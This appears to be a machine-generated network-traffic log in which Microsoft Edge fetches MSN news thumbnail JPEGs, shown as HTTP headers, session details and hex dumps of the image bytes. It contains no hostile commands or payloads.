                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC518INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msOP1
                                                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 03:20:56 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 93971
                                                                                                                                                                                                                                                        X-Datacenter: westus
                                                                                                                                                                                                                                                        X-ActivityId: 70e7be74-f202-491a-99d1-f57575c1e11e
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 93971
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=56119
                                                                                                                                                                                                                                                        Expires: Thu, 21 Nov 2024 15:25:06 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:47 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC15866INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                        Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC16384INData Raw: a4 36 cb df b3 ba c7 b3 04 ed 90 f6 e2 c2 e6 e2 15 12 1c 08 23 50 44 21 50 5e 9a f9 a6 e1 58 88 88 04 75 48 8b 6b 98 b4 55 49 21 35 87 dd 35 26 9a 44 0e 7e 35 49 54 56 24 0a c4 e4 3a d3 25 88 82 73 12 46 2c 8f 29 d5 48 5d 8d c6 6d ee 35 cf db 1b cd 13 3b 65 ce 68 24 82 2e d8 34 30 69 78 42 73 cb ea e3 26 05 79 08 4a a2 ca 49 52 35 6d 63 cb 5c f6 87 76 43 9c 40 9c 23 10 01 c4 8f c4 49 02 4e 65 45 b3 aa 23 1d 30 c2 ef d6 d3 47 11 31 13 3d c0 55 c0 10 0c 29 02 b4 c1 ad 79 db 8a aa 65 6e a9 71 fa 29 25 31 ae 97 e2 b4 2c 69 c5 4d 28 96 43 62 66 0e 29 81 59 31 87 5a 6b 9a bc 6c 6b dc 58 de d3 88 37 17 71 6e 2b 56 04 90 3a 20 95 58 4e 0c 52 db c4 4f 75 a6 70 e9 d5 4b 52 aa 41 6c 45 6f 3e 54 f9 a5 34 8f 1c b8 26 d6 cd c8 02 b5 e4 26 38 d8 2d 03 88 ad 46 87 29 1d
                                                                                                                                                                                                                                                        Data Ascii: 6#PD!P^XuHkUI!55&D~5ITV$:%sF,)H]m5;eh$.40ixBs&yJIR5mc\vC@#INeE#0G1=U)yenq)%1,iM(Cbf)Y1ZklkX7qn+V: XNROupKRAlEo>T4&&8-F)
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC2689INData Raw: cc 99 ce ca d2 0c 19 c8 45 ea b3 1d 04 82 d0 6b 50 e2 40 a7 28 77 ba a9 07 3a 4d 94 43 71 18 32 64 d6 b0 78 ac a2 c5 12 20 1e a2 6e d3 71 06 2b 65 9d 79 10 66 b4 f4 e1 6e aa 84 dc 52 d6 14 06 66 2a 6b aa 89 fc a6 bc bd 62 2b d5 05 65 d2 1c 5c 6f d2 f5 d3 45 0d 70 26 b4 eb 68 eb 62 86 58 e8 2e 83 84 10 31 65 26 48 f3 85 27 aa 0b b8 38 bc d2 4b 9c 60 61 10 0f 5b cc 92 2b ce 55 07 46 d9 93 6b 0b c9 b5 81 a4 0e 0b 9b 6c 12 1d 04 d8 d2 40 91 a7 59 d0 23 34 c0 6e 29 70 ac b6 63 3b 50 cd 4f ba 63 2a 21 bb 8e 26 03 45 04 34 90 db 6a e2 7f 95 b0 06 48 37 b4 52 63 50 7a 84 f0 b9 ae 20 c1 ce 41 11 c2 25 ab 0d a9 ac cd a8 01 12 33 e5 09 d3 3c 41 70 b4 35 bd d8 84 d6 86 87 4e a9 b8 b3 07 6f 6b ad 84 09 10 3f d4 4c c9 e8 2b a8 45 a3 59 63 06 7b 64 1f 5a 8f 9a 0e 17 3d
                                                                                                                                                                                                                                                        Data Ascii: EkP@(w:MCq2dx nq+eyfnRf*kb+e\oEp&hbX.1e&H'8K`a[+UFkl@Y#4n)pc;POc*!&E4jH7RcPz A%3<Ap5Nok?L+EYc{dZ=
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC16384INData Raw: 14 b8 0f 4e b9 ab 76 28 e7 5a 6b c3 35 0e 0e 1e 95 f4 52 11 c4 48 87 54 92 0d 22 04 d2 49 92 ea 6b a4 28 34 a4 9b da 0f 9f 14 da 70 65 5c f2 a7 8a a4 23 43 32 22 b9 29 63 12 08 10 39 ce a7 4d 07 45 a2 97 32 3c 80 5a 3a 52 4c 4e 7c 8d 13 ec ac 12 22 22 73 f2 b4 75 41 49 34 98 a7 01 3c d1 71 54 b9 b2 09 6f 68 69 23 0d 73 24 54 08 88 9e b2 82 40 8b cf 0f 4b d3 ad 16 98 3d 3a 28 c8 21 25 f5 2e a9 26 4e 66 6a 49 d7 8a ac 2e 74 40 8a c6 84 f9 88 f1 55 4e 3b 8e 2d 71 6b 41 c2 d0 dc 20 32 70 80 2a 03 44 bb fc 8e 66 b2 8b 1b 85 a1 a5 ce 2d 93 86 7f f9 60 dd f8 66 9a 12 42 8f a4 05 a0 07 f7 8e d1 42 29 31 9e 19 b1 d0 d5 63 d9 af 1b 1e 08 bb 90 21 87 00 0d c5 07 ba b5 26 fa 7f 8d 05 ea b1 3f a8 c9 6b 81 6e 17 00 40 23 15 08 c4 1c 2a 30 e5 10 79 27 d0 7a b9 27 92 c4
                                                                                                                                                                                                                                                        Data Ascii: Nv(Zk5RHT"Ik(4pe\#C2")c9ME2<Z:RLN|""suAI4<qTohi#s$T@K=:(!%.&NfjI.t@UN;-qkA 2p*Df-`fBB)1c!&?kn@#*0y'z'
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC16384INData Raw: 6e 23 e4 b3 a7 1c bb e0 35 97 19 e5 04 71 b9 5e 6c 02 bd 1d d2 37 43 87 22 29 02 f6 f1 2b 91 f4 02 84 00 63 f8 5d ba b9 77 3d a1 86 e0 44 1e 28 db 83 b4 13 e0 20 ec e3 dc 34 6b 9d 11 20 02 6e 60 4c 5a 49 03 9a 37 73 e8 05 8d be 55 95 a7 30 66 20 c1 13 6a 64 8a 48 36 d3 c1 49 c2 8d 65 00 04 9b 00 65 d9 4d c8 11 41 60 67 55 23 6e b1 6e b9 7a 14 b2 23 0c 9b 13 59 cf d1 10 1d 79 75 01 0e 1c c7 12 08 31 40 5a 69 cc 13 06 a8 ed 70 ac d4 47 23 d1 2c 90 dc 6b 36 b7 19 fa f6 df 8c 34 07 38 1c 6c 73 4c e2 61 11 18 aa 08 a8 21 03 0e be 0e 53 d1 74 5e 48 14 a5 6f 1f 75 0e 69 00 45 ef 33 79 e8 b5 19 04 cb 25 a0 83 20 13 4e 30 24 48 ea 85 4f ba 39 6f dc a4 fd bc 39 f7 66 0c 53 dd 68 39 cb 6f 33 e8 b0 ed 24 5e 69 5f e5 18 17 03 42 68 71 37 a3 86 7c d4 ba 93 20 e2 26 a4
                                                                                                                                                                                                                                                        Data Ascii: n#5q^l7C")+c]w=D( 4k n`LZI7sU0f jdH6IeeMA`gU#nnz#Yyu1@ZipG#,k648lsLa!St^HouiE3y% N0$HO9o9fSh9o3$^i_Bhq7| &
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC7952INData Raw: d6 1d 84 56 26 2d 9f 43 c5 71 b1 df af 67 60 dd 18 48 ac c5 26 3c 59 75 7e ce d0 24 44 45 6e 34 8e 2b ca 79 c8 b6 1d 63 34 f2 1e cb 35 f0 d1 39 5f 2e 0b 18 e9 a7 f1 0f 20 35 c0 c9 b1 5e 46 eb 85 e6 78 7b af 53 71 8e c2 c7 90 40 7b 65 a4 d9 e2 48 91 c4 47 35 e5 6e 06 c7 e3 06 69 5b 5e 64 75 a4 55 6b aa ed 41 80 74 27 82 1b 99 4a 9a e5 4a 55 13 08 26 45 00 3d 68 ba 4f c6 6f 1d cd a7 3b 03 ff 00 4e db b6 58 1c c0 47 eb 38 86 12 22 b1 8c 90 4d 41 88 b2 f4 75 cf 7b 8f 3f 79 7d a6 bc e7 35 b3 35 c3 94 c0 3f 78 cd 22 d1 48 33 23 2c ab 63 d5 14 ed 81 5a 9e a8 a3 6d a4 08 9b d4 88 a0 d2 33 56 8e 35 ca e6 80 75 f4 e0 8c 36 c5 d1 06 db 4c 56 01 35 c8 fd 0a 4e a4 0c 56 14 a4 1b 9b eb cd 1a dc 86 dc 46 18 26 b1 49 89 39 7a a2 3b 6f 03 a2 67 0d ce 40 f3 f6 e6 82 0f 5e
                                                                                                                                                                                                                                                        Data Ascii: V&-Cqg`H&<Yu~$DEn4+yc459_. 5^Fx{Sq@{eHG5ni[^duUkAt'JJU&E=hOo;NXG8"MAu{?y}55?x"H3#,cZm3V5u6LV5NVF&I9z;og@^
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC16384INData Raw: 4a 69 a7 9b 1c 49 22 aa 12 59 fc 9f 71 c7 52 92 a2 92 3f 23 53 a5 fa 06 54 22 15 25 1f 94 fe 30 8a 19 45 28 65 6a 7c ba 3f 10 45 0c a2 94 32 b5 f9 47 e3 0c a1 94 42 a4 a7 f2 2f c6 1a 85 65 49 57 33 c1 17 52 55 15 32 b5 c9 70 4a 94 ca 92 53 3b 2e 09 2a 4a 72 a0 94 f2 5c 18 a9 5a 54 ca 79 2e 0c 52 52 5c a4 b9 5a b8 a9 64 32 f5 1f b1 06 75 1d 35 cf fb 02 df b9 a3 31 e6 8b 2f d1 a9 8e 89 4a 57 2b be 25 82 b8 82 03 be 31 83 aa 27 c7 df b7 fa 68 e7 d2 7f aa 7e af 43 10 54 1c bc 7f f7 cc ea 91 f8 e7 64 d3 c5 6b fd bf c9 7d 99 fc df 1c f7 7b ed 2b b7 6d b8 97 c6 3f fe 53 75 8e 22 02 bd bf f9 1f 8c 73 27 f6 96 5f fd 3e 81 72 ef fc 07 cb db df ac ff 00 9f 66 ba ff 00 19 f1 cf 19 da be e8 ec 3a 26 0a f2 be 23 7b 6f 6c c1 7b 47 49 5f 29 bb f1 9f 13 b9 47 6f 3c d2 c5
                                                                                                                                                                                                                                                        Data Ascii: JiI"YqR?#ST"%0E(ej|?E2GB/eIW3RU2pJS;.*Jr\ZTy.RR\Zd2u51/JW+%1'h~CTdk}{+m?Su"s'_>rf:&#{ol{GI_)Go<
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC1928INData Raw: a9 57 45 92 24 d1 0e b3 4a 2d 88 05 25 c0 73 44 8d 89 10 b2 8f d8 0a c0 f3 e0 ac 1a b5 51 55 18 b4 13 ea b6 37 73 1e e1 04 48 5a 88 12 6a 26 46 99 a8 c5 4d 47 a2 78 8d 74 62 01 6c 7f c7 d1 73 cc 18 3a 66 94 f8 36 f3 57 11 c9 d1 fb 2d d7 87 d9 2c 67 c7 82 82 09 e1 d0 cf b2 d3 cb ff 00 84 ab 8a da 3e 3f 02 16 c4 7c 7d c2 0c f3 f5 09 ce 77 e5 43 e4 ac 5a 36 29 f1 f7 58 1c 8d 34 28 53 9c c8 d0 dd 69 cd b4 e8 8c 3a 34 cb ba 8c c2 41 d2 26 e7 c6 88 77 a8 be 89 82 0b a6 ca c5 aa 92 e1 4e 23 f9 5a 97 b7 9f c9 4c c1 ee 17 cd 31 39 43 86 8a c2 ae b1 3e 47 ee 98 75 32 3d 2a 14 52 68 4b 4e 99 27 7f c8 7f dc 14 96 5d 84 67 c8 d4 2c 6a d0 44 18 50 45 2f 88 7b ad 43 f8 d0 e8 84 bc 41 c2 26 12 26 90 e1 4d 42 52 0d 1c 23 aa d2 e6 8a 59 48 c4 da 8e 1d 52 06 3f c9 be 89 1c
                                                                                                                                                                                                                                                        Data Ascii: WE$J-%sDQU7sHZj&FMGxtbls:f6W-,g>?|}wCZ6)X4(Si:4A&wN#ZL19C>Gu2=*RhKN']g,jDPE/{CA&&MBR#YHR?


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        91192.168.2.54987923.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC634OUTGET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA12sf7A
                                                                                                                                                                                                                                                        Last-Modified: Sun, 20 Oct 2024 23:49:33 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 114962
                                                                                                                                                                                                                                                        X-Datacenter: eastus
                                                                                                                                                                                                                                                        X-ActivityId: f9c97283-f306-495f-9b12-cae296533644
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 114962
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=86214
                                                                                                                                                                                                                                                        Expires: Thu, 21 Nov 2024 23:46:41 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:47 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC15864INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                        Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC16384INData Raw: da a2 66 d0 8a a6 2d 98 a6 2f 2d 29 89 be 4e 39 24 9e 3c ca c9 6c 03 84 93 dc b9 27 52 75 44 2e 13 33 10 2e 9d 07 af 45 54 38 c5 fd ca e3 2b a2 e5 30 72 b2 4e 32 06 5a 5d 46 06 20 9e a8 4b 44 d3 0b 39 00 9c 91 42 d3 cd 94 78 b4 e5 29 18 34 d8 bf 6e 2a 3c ee 90 16 0a 2e a6 49 37 12 50 5a f0 e3 74 81 04 cd a6 ca 63 78 c9 f2 f4 aa c1 b8 6e 6f c1 04 64 99 c6 4c 77 fa 85 91 06 66 51 24 60 8c c5 af 19 81 9f 72 98 67 ec 48 18 55 cd a0 8b e8 79 1f 4a bb 3d a0 70 81 c6 75 31 fb ca 63 81 85 00 09 c9 5d 6b 0e 86 fe 2a 40 08 9b 22 66 4f 72 b0 01 1c e7 8a 08 04 6c 6d e7 dd e0 af b1 92 09 fa 41 f0 ee 40 b1 c2 d5 dc 61 a4 99 e5 de a6 ac 00 25 b2 1d 88 0c 18 6f 8a 22 79 8e 00 1b a6 01 4a b3 58 d9 91 7d 33 45 27 64 23 d1 cd 05 c4 d3 0b 63 3c a1 49 0d 73 b0 91 11 88 88 e3
                                                                                                                                                                                                                                                        Data Ascii: f-/-)N9$<l'RuD.3.ET8+0rN2Z]F KD9Bx)4n*<.I7PZtcxnodLwfQ$`rgHUyJ=pu1c]k*@"fOrlmA@a%o"yJX}3E'd#c<Is
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC1274INData Raw: b9 d5 e8 5a 7c d1 4d ed 0a 3b a6 09 1a eb a0 e4 93 89 78 90 60 f0 c5 88 0e 90 a5 56 6a 51 92 95 42 e6 90 73 d2 f9 4c cf ad d5 37 ba 41 92 48 cb 90 27 8f 44 e9 6b 10 72 89 95 a6 d5 0e 7e fc 37 3d 6d 1d 17 01 c6 09 37 ce 07 ee b3 9a 7a 3b 62 32 54 4b 9a ef 4d 86 1d ba 6c 75 13 9c 6b af 92 e6 31 c1 d2 0c 93 63 33 6b c4 dc e4 bc f9 87 4c c3 ae 26 ec ee b6 49 6c 88 06 77 b5 b7 13 75 83 50 82 44 18 eb 3e 07 db 79 58 44 5f e4 d3 0c 59 a2 2f 2e 36 c7 b2 d4 a1 5f 11 20 b0 b1 d7 16 f2 3e c2 57 4f b4 69 19 4c 67 98 10 23 28 0b d3 fa 8f a8 a7 7b 66 29 b4 c4 c4 c6 5d 9c de 76 1b 3c 9f a6 fa 6a b6 37 a6 ab c5 51 31 31 97 9e 8f 56 ed ba 8d 2a e0 87 b1 ae 74 49 91 7f 11 07 c5 5d 63 59 04 e4 64 4c 9e 47 5c 93 a3 77 73 6f 3a 2a 98 8e df db 46 13 76 7b 9b 5b 7b 99 57 44 55
                                                                                                                                                                                                                                                        Data Ascii: Z|M;x`VjQBsL7AH'Dkr~7=m7z;b2TKMluk1c3kL&IlwuPD>yXD_Y/.6_ >WOiLg#({f)]v<j7Q11V*tI]cYdLG\wso:*Fv{[{WDU
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC16384INData Raw: 78 cb b7 35 dd 82 1c 23 29 c2 73 e4 42 f4 1f a3 01 9f f3 00 e8 9c 25 b7 81 d0 c6 57 57 b7 46 17 17 7d b9 cb c9 e7 c6 4f 6a 7e 9f 6b fa bc de 79 b5 6a 16 d2 70 73 41 76 36 43 80 c9 96 90 40 99 8b 66 ba 6f d9 a6 06 36 4c 9e cc 16 3b 78 ea 1b 06 c7 42 bd 5b 6b e9 e2 e3 a2 ba e7 37 8f 7b c4 3a f7 28 a2 9c a2 ea 58 2a 16 e2 c3 48 88 06 77 b5 31 26 f7 b8 5d 1a 75 b1 61 a2 f7 34 c0 c8 b6 1b 8b 16 2c a4 92 78 18 85 d9 cb 36 33 7b 65 ab 96 c7 95 f9 39 58 1a c6 b8 96 50 24 5f 0e 07 3a 47 59 85 dd ec e8 b6 71 35 87 98 2e 6e 9d 4f a1 6f e6 e5 c5 b9 da 9f 25 fe 2e 19 71 7d b1 06 e3 73 77 48 c3 70 2c 2f 7e e5 ba b5 a8 3a ab 9b 4d a4 01 68 2e b9 e7 70 7e 2b a6 c7 4c 4d b3 41 4c c2 6a 8c ec 89 6c 83 95 da 65 b9 09 47 ea 19 d8 ba 99 a4 d7 17 38 1c 52 0c 5a 22 e3 da 92 ed
                                                                                                                                                                                                                                                        Data Ascii: x5#)sB%WWF}Oj~kyjpsAv6C@fo6L;xB[k7{:(X*Hw1&]ua4,x63{e9XP$_:GYq5.nOo%.q}swHp,/~:Mh.p~+LMALjleG8RZ"
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC16384INData Raw: 50 56 79 c7 fc 76 3f 76 10 e9 04 5b ee 2b b3 ba e6 de 9a e2 78 c4 39 3b c6 35 53 31 cd c8 1b 38 12 5a 5e ec 24 8c 25 b8 26 38 19 32 17 66 a8 a7 8d 80 54 37 9b b4 36 d8 44 df 3c d7 36 0e dd 5d 73 69 98 ce 1d 18 9c b1 7b 4e 4f 1d 50 b8 61 73 88 68 78 c4 2f 98 98 f8 af 45 b4 ff 00 08 66 4f b3 a6 5a dc a3 96 57 e0 bc fc a2 6c ec ae 6d 6b 5b c1 db 69 73 d3 9d f5 84 bb 0b c8 a3 9f cc ef 8a e7 53 ac 69 1c 00 18 18 9c 72 32 0e 5c c4 67 2a 36 e2 f1 3d ac e9 dc 8a 66 5a 55 3a 76 7e e2 69 99 85 05 a5 ea 07 ce 82 42 60 02 4d 00 18 42 00 01 09 80 0d 08 00 04 d2 33 01 09 00 66 92 01 03 42 46 0c 21 23 20 10 91 98 34 92 00 1a 48 00 1a 48 06 4d 2c a4 66 46 92 01 91 a1 00 03 51 39 e1 b6 cc a4 53 36 36 b4 51 8b b0 aa 18 55 cd 4b c9 ee d6 fd 16 5b 93 68 ed 67 33 9e 6d 36 69
                                                                                                                                                                                                                                                        Data Ascii: PVyv?v[+x9;5S18Z^$%&82fT76D<6]si{NOPashx/EfOZWlmk[isSir2\g*6=fZU:v~iB`MB3fBF!# 4HHM,fFQ9S66QUK[hg3m6i
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC7952INData Raw: 99 de f5 63 6b 11 56 b6 1c 50 da 8e 1c be eb 67 a6 4b 48 9c a3 b1 e7 ce f4 44 cc 5f 4f d9 cb 86 73 7a 34 6c cc d3 4c db 5b 4f 9b 86 03 9a 29 b4 8c 98 5a 6f ae 8b 4e 04 d4 63 65 db d1 7d 78 9d 38 2e dc 50 f3 27 7b f1 99 bb 1a 28 98 88 7a 94 ed 7e 51 0f 1f 56 db 70 ff 00 f2 b3 d8 ba 95 ff 00 1f 5e 9e d1 da 4b 63 10 70 92 6f e5 aa f5 ef 7a 7d 1e 5d 3f 57 44 d3 69 89 bd bd b8 bc 8b 5a b8 ed 87 a5 57 d2 d5 8f 14 4c 5a eb cf 2f c5 46 1b 3f cd 4e 71 5a 05 ee 32 ba ee 56 d8 aa 06 d2 30 e7 61 2c aa ec 22 cd 05 da 98 cb aa ed a6 a8 89 9c f8 3c 8a 37 a6 6a d3 2f 97 d9 cd bb 4d 53 46 9c 7f 67 a5 b9 4d 38 27 3c f3 8b 65 9c c4 67 6e aa db 67 e3 a8 ed 8f 6b aa 76 80 b4 16 8c 24 0b 1f f6 95 5f f2 9f 92 ab b1 55 63 58 da 6e 0e 61 76 f0 33 20 c6 84 2f 66 2b 98 65 44 62 8e
                                                                                                                                                                                                                                                        Data Ascii: ckVPgKHD_Osz4lL[O)ZoNce}x8.P'{(z~QVp^Kcpoz}]?WDiZWLZ/F?NqZ2V0a,"<7j/MSFgM8'<egngkv$_UcXnav3 /f+eDb
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC16384INData Raw: 33 39 b8 58 6b 99 8a 75 38 7d be a6 cb a9 b4 d4 0d a0 d0 c8 00 cd c3 89 cb 47 5e e0 9e 37 55 74 ca 22 e5 33 2e 40 d9 6b 97 0e d1 ae 6f 00 73 3d c2 55 16 ed 55 41 8c 6e 23 84 9f 7a bb a5 36 93 bb a4 ea 55 40 24 b1 d8 8d a3 80 d2 14 4c da ea c0 69 27 94 ba c3 ce 02 24 8c ee a6 dd 96 b6 6e 63 b8 1b 1f 8e 41 5c a7 55 c4 61 c5 79 bc 62 93 c3 5c ba a1 49 b2 b8 70 6e 9e c8 e6 dd c0 5f 2b 80 07 43 af 35 97 b0 01 8d ef c4 ec 80 cc 47 8d d1 06 8b 05 a6 8b 61 0e 64 1b b8 3b 29 bc 09 12 4b 6c 0e 97 55 08 0e 69 2d 37 91 ca c7 92 19 dc 58 dd ea 1b 39 22 ce 61 13 25 d3 00 18 81 ba eb c4 c0 c8 ae 76 cc e7 d3 99 0e 01 ce ee 83 20 83 f1 e6 9c c5 c1 40 5c da 36 0d a5 d4 de e6 35 93 4a 0b 9a c2 71 83 f5 b4 44 75 32 6c 17 42 96 d8 29 d5 63 e6 03 9b 84 c4 e6 04 72 d2 ca 62 95
                                                                                                                                                                                                                                                        Data Ascii: 39Xku8}G^7Ut"3.@kos=UUAn#z6U@$Li'$ncA\Uayb\Ipn_+C5Gad;)KlUi-7X9"a%v @\65JqDu2lB)crb
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC7678INData Raw: 99 5a 41 18 66 53 40 00 a5 08 06 45 74 d0 0c 89 08 06 09 34 00 19 4d 00 02 42 08 c0 42 00 04 84 00 64 84 00 02 10 0c 89 34 ac 15 72 24 5d 2b 1a ae 92 4d 2b 05 5c 89 09 03 19 04 5d 05 99 9e 41 24 8e f2 71 25 68 08 41 5e 4c 5a 02 68 06 02 69 17 aa a0 e2 39 1a d0 05 08 99 e6 a8 5c 44 f4 48 13 01 4c a6 65 ac 2e 21 b0 8e f4 a5 12 a8 5c 43 48 84 e5 9c c9 aa cd 26 13 96 61 49 47 54 81 09 4d 93 2a 83 84 81 c4 6b 92 cd b5 f0 ba ce aa 62 44 b5 a6 a9 8e 25 16 eb 0e 95 2a 84 98 97 47 af 82 cd 1f e8 90 46 51 3e 2b 83 72 88 b1 ee f6 bd 2d aa e6 e5 b3 9f 07 6e 9b 6a 3e e4 34 5b 22 ef fb 6e 7d aa 16 64 08 02 da 48 69 f0 8f 89 0b cb aa 68 8d 2f af 4f ba aa f6 ca ef 5a 8c 73 ad b4 d2 ff 00 64 53 ed c1 d6 8d a1 b1 21 90 23 ea f3 b1 52 53 63 dd 20 b4 81 c9 cd 3e be 6b 8f f0
                                                                                                                                                                                                                                                        Data Ascii: ZAfS@Et4MBBd4r$]+M+\]A$q%hA^LZhi9\DHLe.!\CH&aIGTM*kbD%*GFQ>+r-nj>4["n}dHih/OZsdS!#RSc >k
